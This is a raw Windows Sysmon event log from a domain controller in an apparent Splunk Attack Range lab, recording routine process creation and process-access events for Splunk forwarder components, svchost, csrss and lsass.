08:41:30.293{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16BA-5F84-6800-000000007F01}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002271Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.293{5D479F2C-16B1-5F84-3000-000000007F01}26164088C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16BA-5F84-6800-000000007F01}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002270Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.126{5D479F2C-16BA-5F84-6800-000000007F01}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002312Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.980{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16BB-5F84-6A00-000000007F01}3364C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002311Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002310Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002309Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002308Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002307Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002306Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002305Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002304Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002303Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002302Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.980{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16BB-5F84-6A00-000000007F01}3364C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002301Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.980{5D479F2C-16B1-5F84-3000-000000007F01}26164088C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16BB-5F84-6A00-000000007F01}3364C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002300Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.814{5D479F2C-16BB-5F84-6A00-000000007F01}3364C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002299Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.933{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002298Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.933{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002297Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.933{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002296Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.136{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16BA-5F84-6900-000000007F01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002295Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002294Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002293Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002292Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002291Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002290Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002289Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 